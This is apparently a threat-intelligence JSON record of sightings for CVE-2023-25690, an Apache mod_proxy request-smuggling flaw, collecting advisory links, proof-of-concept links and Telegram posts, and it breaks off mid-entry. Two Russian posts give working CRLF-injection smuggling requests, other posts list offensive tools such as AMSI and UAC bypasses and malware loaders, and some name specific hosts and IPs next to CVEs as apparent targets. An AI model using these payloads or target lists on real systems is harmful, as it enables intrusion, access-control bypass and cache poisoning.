{"vulnerability": "CVE-2023-25690", "sightings": [{"uuid": "6d78ca3d-1ee1-461b-ae2d-2376ee1e8894", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-105-08", "content": "", "creation_timestamp": "2025-04-15T10:00:00.000000Z"}, {"uuid": "cb37206f-6cd7-411d-a126-b0a343d245ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-027-02", "content": "", "creation_timestamp": "2026-01-27T11:00:00.000000Z"}, {"uuid": "8751d6d5-21dd-455a-8172-1fcdd554fa9f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-133-01", "content": "", "creation_timestamp": "2025-05-13T10:00:00.000000Z"}, {"uuid": "9e9affdd-8edd-44ca-bd39-842ca9e4c939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://gist.github.com/Darkcrai86/54e3b7c9b1e9f79562babfe0c134a2b7", "content": "", "creation_timestamp": "2025-09-04T12:40:58.000000Z"}, {"uuid": "4ae32fe9-6cc0-4562-9197-e7f08706a042", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2023-25690", "type": "seen", "source": "https://gist.github.com/Darkcrai86/96275252938805a16e37791930822074", "content": "", "creation_timestamp": "2025-09-05T08:46:59.000000Z"}, {"uuid": "11aec950-4925-49b6-81d4-e0125678033a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/yafcab/46", "content": "https://github.com/dhmosfunk/CVE-2023-25690-POC", "creation_timestamp": "2023-05-23T13:25:45.000000Z"}, {"uuid": "9a2a62fc-de31-4595-9914-c7c0da036579", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/cKure/11018", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability.\n\nhttps://github.com/dhmosfunk/CVE-2023-25690-POC", "creation_timestamp": "2023-05-23T08:56:41.000000Z"}, {"uuid": "35d211b9-73ac-4f5a-a625-74cd3e584b02", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "Telegram/Hf_SunJuoYNf_bsQCJ20cuXyI7bzH8EMEXzusn30k3vpXeQ", "content": "", "creation_timestamp": "2024-10-15T10:14:15.000000Z"}, {"uuid": "85d1faa6-5a4d-40ae-b6ac-751d813d93a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4243", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aFix URL containing SPACES after Apache upgrade  CVE-2023-25690\nURL\uff1ahttps://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-04-25T17:21:53.000000Z"}, {"uuid": "32c24e14-639b-4fc9-b134-12cc3d54cd25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/6197", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-25690 - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 to 2.4.55 leads to HTTP Request Smuggling.\nURL\uff1ahttps://github.com/sergiovks/CVE-2023-25690-exploit\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-12-15T18:03:45.000000Z"}, {"uuid": "995232f3-17d9-4976-87e4-26563a9a33c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/poxek/2967", "content": "Apache HTTP-Request-Smuggling (CVE-2023-25690)\n\n\u0413\u0434\u0435-\u0442\u043e \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 \u0431\u044b\u043b\u0430 \u0448\u0443\u043c\u0438\u0445\u0430 \u0441 \u043d\u043e\u0432\u043e\u0439 \u0432\u0443\u043b\u043d\u043e\u0439 \u0432 Apache, \u043a\u043e\u0433\u0434\u0430 mod_proxy \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043f\u0440\u0430\u0432\u0438\u043b\u0430\u043c\u0438 RewriteRule \u0438 ProxyPassMatch, \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a HTTP-Request-Smuggling\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0431\u044b\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043f\u0440\u0438\u043a\u043e\u043b\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 URL https://testik.com/categories/1, \u0430 RewriteRule \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 URL \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 1 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u044f ^/categories/(.*). \u0417\u0430\u0442\u0435\u043c \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 URL \u043d\u0430 http://testik.com:8080/categories?id=1, \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u044f \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0447\u0435\u043d\u043d\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u043c\u0443 URL \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 id \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u0430.\n\nProxyPassReverse, \u0443\u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u043c\u0435\u043d\u044f\u0435\u0442 \u0434\u043e\u043c\u0435\u043d \u0438 \u0430\u0434\u0440\u0435\u0441 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043d\u0430 \u0434\u043e\u043c\u0435\u043d \u0438 \u0430\u0434\u0440\u0435\u0441 \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0447\u0442\u043e\u0431\u044b \u043a\u043b\u0438\u0435\u043d\u0442 \u043c\u043e\u0433 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0443 \u0441 \u043f\u0440\u043e\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 /categories/ http://example-shop.com:8080/. \u0412\u0435\u0441\u0435\u043b\u043e, \u0434\u0430?\n\n\n\u041f\u043b\u044e\u0441, \u0437\u0430\u043c\u0435\u0447\u0443, \u0447\u0442\u043e Apache \u0431\u044b\u043b \u0443\u044f\u0437\u0432\u0438\u043c \u0435\u0449\u0435 \u043a CRLF-injection, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u043c \u0431\u0443\u0434\u0435\u0442 \u043d\u0443\u0436\u0435\u043d \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c\n\n\u0414\u043b\u044f \u0435\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043c\u044b \u0443\u0436\u0435 \u0438\u043c\u0435\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0438\u043c \u0437\u0430\u043f\u0440\u043e\u0441\n\nGET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1\nHost: localhost\n\n\u0418 \u0442\u0435\u043f\u0435\u0440\u044c \u0434\u0435\u043b\u0430\u0435\u043c \u0441\u043c\u0430\u0433\u0433\u043b\u0438\u043d\u0433 \u0437\u0430\u043f\u0440\u043e\u0441\n\nGET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1\nHost: localhost\n\n\u0418 \u043e\u0442\u0432\u0435\u0442 \u0431\u0443\u0434\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439\n\nGET /categories.php?id=1 HTTP/1.1\nHost: localhost\n\nGET /SMUGGLED HTTP/1.1\nHost: backend", "creation_timestamp": "2023-06-07T08:29:47.000000Z"}, {"uuid": "8e3dc2fc-2ec1-41f0-81e1-b9401b0442ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/monkey_hacker/74", "content": "Apache HTTP-Request-Smuggling (CVE-2023-25690)\n\n\u0413\u0434\u0435-\u0442\u043e \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 \u0431\u044b\u043b\u0430 \u0448\u0443\u043c\u0438\u0445\u0430 \u0441 \u043d\u043e\u0432\u043e\u0439 \u0432\u0443\u043b\u043d\u043e\u0439 \u0432 Apache, \u043a\u043e\u0433\u0434\u0430 mod_proxy \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043f\u0440\u0430\u0432\u0438\u043b\u0430\u043c\u0438 RewriteRule \u0438 ProxyPassMatch, \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a HTTP-Request-Smuggling\n\n\u0412 \u043f\u0435\u0440\u0432\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0431\u044b\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043f\u0440\u0438\u043a\u043e\u043b\n\n\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 URL https://testik.com/categories/1, \u0430 RewriteRule \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 URL \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 1 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e \u0432\u044b\u0440\u0430\u0436\u0435\u043d\u0438\u044f ^/categories/(.*). \u0417\u0430\u0442\u0435\u043c \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 URL \u043d\u0430 http://testik.com:8080/categories?id=1, \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u044f \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0447\u0435\u043d\u043d\u043e\u0435 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a \u043f\u0435\u0440\u0435\u043f\u0438\u0441\u0430\u043d\u043d\u043e\u043c\u0443 URL \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 id \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 \u0437\u0430\u043f\u0440\u043e\u0441\u0430.\n\nProxyPassReverse, \u0443\u0436\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u043c\u0435\u043d\u044f\u0435\u0442 \u0434\u043e\u043c\u0435\u043d \u0438 \u0430\u0434\u0440\u0435\u0441 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043d\u0430 \u0434\u043e\u043c\u0435\u043d \u0438 \u0430\u0434\u0440\u0435\u0441 \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u0447\u0442\u043e\u0431\u044b \u043a\u043b\u0438\u0435\u043d\u0442 \u043c\u043e\u0433 \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0430\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043a\u043e\u043d\u0442\u0435\u043d\u0442\u0443 \u0441 \u043f\u0440\u043e\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 /categories/ http://example-shop.com:8080/. \u0412\u0435\u0441\u0435\u043b\u043e, \u0434\u0430?\n\n\n\u041f\u043b\u044e\u0441, \u0437\u0430\u043c\u0435\u0447\u0443, \u0447\u0442\u043e Apache \u0431\u044b\u043b \u0443\u044f\u0437\u0432\u0438\u043c \u0435\u0449\u0435 \u043a CRLF-injection, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u043c \u0431\u0443\u0434\u0435\u0442 \u043d\u0443\u0436\u0435\u043d \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c\n\n\u0414\u043b\u044f \u0435\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043c\u044b \u0443\u0436\u0435 \u0438\u043c\u0435\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0438\u043c \u0437\u0430\u043f\u0440\u043e\u0441\n\nGET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1\nHost: localhost\n\n\u0418 \u0442\u0435\u043f\u0435\u0440\u044c \u0434\u0435\u043b\u0430\u0435\u043c \u0441\u043c\u0430\u0433\u0433\u043b\u0438\u043d\u0433 \u0437\u0430\u043f\u0440\u043e\u0441\n\nGET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1\nHost: localhost\n\n\u0418 \u043e\u0442\u0432\u0435\u0442 \u0431\u0443\u0434\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439\n\nGET /categories.php?id=1 HTTP/1.1\nHost: localhost\n\nGET /SMUGGLED HTTP/1.1\nHost: backend", "creation_timestamp": "2023-06-07T08:29:28.000000Z"}, {"uuid": "99c279c5-9554-49b2-969c-9ef832632855", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "Telegram/rwxaLd9KWQTIgwCgLykDlCAjWpJJFXYvWELkEfFrjXC617U", "content": "", "creation_timestamp": "2026-04-05T15:00:08.000000Z"}, {"uuid": "b343c2c6-2068-4272-a3d2-b2ff1b7559b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "Telegram/-XTAo1OAjWoLAH6KohP9So5Qk-AdaturLDq5ACtTb13aQrc", "content": "", "creation_timestamp": "2025-06-01T21:00:05.000000Z"}, {"uuid": "7b32f76b-c04c-4b87-9c16-2578605454ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "Telegram/zyh2j7QPoGimdfNrucDW8nGVJvwQaa6_ybAaByh8mMfpDfE", "content": "", "creation_timestamp": "2023-03-08T16:18:04.000000Z"}, {"uuid": "6382bb23-0e1f-414e-b920-91d117e1ee70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3060", "content": "Tools - Hackers Factory\n\n\u200b\u200binteractsh\n\nOpen-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions.\n\nhttps://github.com/projectdiscovery/interactsh\n\n#pentesting #redteam #bugbounty\n\n\u200b\u200bHSTS Parser\n\nA tool to parse Firefox and Chrome HSTS databases into #forensic artifacts!\n\nhttps://github.com/thebeanogamer/hstsparser\n\n#cybersecurity #infosec\n\nOWASP Web Application Security Testing Checklist.\n\nhttps://github.com/0xRadi/OWASP-Web-Checklist\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bFile Archiver In The Browser\n\nTwo sample phishing templates that can be used with .zip domains to emulate a file archiver in the browser.\n\nhttps://github.com/mrd0x/file-archiver-in-the-browser\n\nFile Archiver In The Browser:\nhttps://mrd0x.com/file-archiver-in-the-browser/\n\n#infosec #pentesting #redteam\n\n\u200b\u200bRansomchats\n\nHere you'll find #ransomware negotiations normalised as JSON files. Ransomware negotiations are usually not shared widely, limiting the understanding of the process. This project aims at changing that, in a respectful manner for the victims of cyberattacks: chats are anonymized as long as the victim hasn't been publicly disclosed, either by the attackers or in the media.\n\nhttps://github.com/Casualtek/Ransomchats\n\n#cybersecurity #infosec\n\n\u200b\u200bIntroduction to macOS - TCC\n\nTCC (Transparency, Consent and Control) is a macOS mechanism aimed at protecting sensitive information. This includes access to user's private files (e.g. files on the Desktop), access to the camera and the microphone, location services access and many more. Interestingly, TCC protects those even against root-level attacks.\n\nhttps://github.com/yo-yo-yo-jbo/macos_tcc\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bNixImports\n\nA .NET malware loader, using API-Hashing and dynamic invoking to evade static analysis.\n\nhttps://github.com/dr4k0nia/NixImports\n\n#malware #cybersecurity #infosec\n\n\u200b\u200bCVE-2023-2822\n\nSimple flask application to implement an intentionally vulnerable web app to demo CVE-2023-2822.\n\nhttps://github.com/cberman/CVE-2023-2822-demo\n\n#cve #cybersecurity #infosec\n\n\u200b\u200bDamn Vulnerable Bank\n\nDamn Vulnerable Bank is designed to be an intentionally vulnerable android application. This provides an interface to assess your android application security hacking skills.\n\nhttps://github.com/rewanthtammana/Damn-Vulnerable-Bank\n\n#cybersecurity #infosec #pentesting\n\n\u200b\u200bCVE 2023 25690 \n\nProof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability.\n\nhttps://github.com/dhmosfunk/CVE-2023-25690-POC\n\n#cve #poc #infosec\n\n\u200b\u200bShaco\n\nShaco is a minimal C linux agent for Havoc. Shaco communicate with http to the server using hardcoded socket\n\nhttps://github.com/souzomain/Shaco\n\n#infosec #pentesting #redteam\n\n\u200b\u200bShellcrypt\n\nA single-file cross-platform quality of life tool to obfuscate a given shellcode file and output in a useful format for pasting directly into your source code.\n\nhttps://github.com/iilegacyyii/Shellcrypt\n\n#infosec #pentesting #redteam\n\n\u200b\u200bweb2shell\n\nA Python program used to automate converting webshells into reverse shells. If you regularly do CTF, HTB, or red teaming you've probably spent a good chunk of time testing payloads to convert a webshell into a reverse shell. This tool aims to simplify this process. \n\nhttps://github.com/ejedev/web2shell\n\n#infosec #pentesting #redteam\n\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory", "creation_timestamp": "2023-05-23T17:00:05.000000Z"}, {"uuid": "09d1aad2-fbf5-468c-93ba-7f2e2e373e34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/arpsyndicate/151", "content": "#ExploitObserverAlert\n\nCVE-2023-25690\n\nDESCRIPTION: Exploit Observer has 65 entries related to CVE-2023-25690. Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack.\n\n\n\n\nConfigurations are affected when mod_proxy is enabled along with some form of RewriteRule\n or ProxyPassMatch in which a non-specific pattern matches\n some portion of the user-supplied request-target (URL) data and is then\n re-inserted into the proxied request-target using variable \nsubstitution. For example, something like:\n\n\n\n\nRewriteEngine on\nRewriteRule \"^/here/(.*)\" \"http://example.com:8080/elsewhere?$1\"; [P]\nProxyPassReverse /here/ http://example.com:8080/\n\n\nRequest splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.\n\nFIRST-EPSS: 0.032570000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-11-13T02:56:53.000000Z"}, {"uuid": "2b0528d8-29bf-4807-bd0a-eb7fa986ec07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://t.me/arpsyndicate/1990", "content": "#ExploitObserverAlert\n\nCVE-2023-25690\n\nDESCRIPTION: Exploit Observer has 68 entries related to CVE-2023-25690. Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow a HTTP Request Smuggling attack.     Configurations are affected when mod_proxy is enabled along with some form of RewriteRule  or ProxyPassMatch in which a non-specific pattern matches  some portion of the user-supplied request-target (URL) data and is then  re-inserted into the proxied request-target using variable  substitution. For example, something like:     RewriteEngine on RewriteRule \"^/here/(.*)\" \"http://example.com:8080/elsewhere?$1\"; [P] ProxyPassReverse /here/ http://example.com:8080/   Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.\n\nFIRST-EPSS: 0.032570000\nNVD-IS: 5.9\nNVD-ES: 3.9", "creation_timestamp": "2023-12-18T13:01:45.000000Z"}, {"uuid": "4dbbb115-c7f6-4d1d-981f-d62c0c3cf7e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/5117", "content": "https://worldphone.in/\n\nhttps://43.251.214.90/login\n\nCVE-2024-38474, CVE-2023-25690", "creation_timestamp": "2024-12-15T07:36:42.000000Z"}, {"uuid": "468a0354-850d-4227-9fc0-46832a10fd6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://t.me/WARLOCK_DARK_ARMY_OFFICIALS/5115", "content": "tatacommunications-ts.com\n\nhttps://115.110.196.19\n\nCVE-2022-23943\nCVE-2023-25690\nCVE-2024-40898", "creation_timestamp": "2024-12-15T07:36:23.000000Z"}, {"uuid": "cff120df-eebe-414e-8cc5-1f8ee7d6aa83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/professional_c_h/2118", "content": "CVE-2023-25690 : Apache HTTP Server 2.4.0 > 2.4.55 / 56 - HTTP Request Smuggling\nhttps://xz.aliyun.com/t/12345\n\n\n@Professional_c_h\n@Card_crack_hack", "creation_timestamp": "2023-07-28T12:29:26.000000Z"}, {"uuid": "c613ee49-0210-46f5-8588-90625fafbfd0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/RAT070/624", "content": "\u200b\u200bCVE 2023 25690 \n\nProof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability.\n\nhttps://github.com/dhmosfunk/CVE-2023-25690-POC\n\n#cve #poc #infosec", "creation_timestamp": "2023-05-23T19:20:35.000000Z"}, {"uuid": "e82c80d1-8b46-45f2-83ee-1229bd2a6650", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://t.me/breachdetector/351828", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"CVE-2023-25690 Mod Proxy Yap\u0131land\u0131rmas\u0131 Nedir ?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"04 Oct 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-10-04T12:35:53.000000Z"}, {"uuid": "9a8e1e7c-a854-4f19-ae4f-5aad66be8f8d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "seen", "source": "https://t.me/breachdetector/351837", "content": "{\n  \"Source\": \"https://www.turkhackteam.org/\",\n  \"Content\": \"What is CVE-2023-25690 Mod Proxy Configuration?\", \n  \"author\": \" ('BARBAROS)\",\n  \"Detection Date\": \"04 Oct 2023\",\n  \"Type\": \"Data leak\"\n}\n\ud83d\udd39 t.me/breachdetector \ud83d\udd39", "creation_timestamp": "2023-10-04T12:36:17.000000Z"}, {"uuid": "cf8e9a00-2dec-494a-82a2-268335d90892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-25690", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/3191", "content": "Hackers Factory \n\nRedEye is a visual analytic tool supporting Red & Blue Team operations\n\nhttps://github.com/cisagov/RedEye\n\nA suite of tools to disrupt campaigns using the Sliver C2 framework.\n\nhttps://github.com/ACE-Responder/RogueSliver\n\nUAC Bypass By Abusing Kerberos Tickets\n\nhttps://github.com/wh0amitz/KRBUACBypass\n\nEscalate Service Account To LocalSystem via Kerberos\n\nhttps://github.com/wh0amitz/S4UTomato\n\nRDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact\n\nhttps://github.com/GoSecure/pyrdp\n\n\"waf-bypass-maker/waf-community-bypasses\"\n\nhttps://github.com/waf-bypass-maker/waf-community-bypasses\n\nAmsi Bypass payload that works on Windwos 11\n\nhttps://github.com/ziyishen97/Amsi_Bypass_In_2023\n\nA curated list of various bug bounty tools\n\nhttps://github.com/vavkamil/awesome-bugbounty-tools\n\nSearch this list of OSINT Practitioners and learn about OSINT, it includes numerous, blogs and tutorials.\n\nhttps://github.com/cqcore/OSINT-Practitioners\n\nMaldev Academy DLL Loader vs Crowdstrike\n\nThe DLL loader is 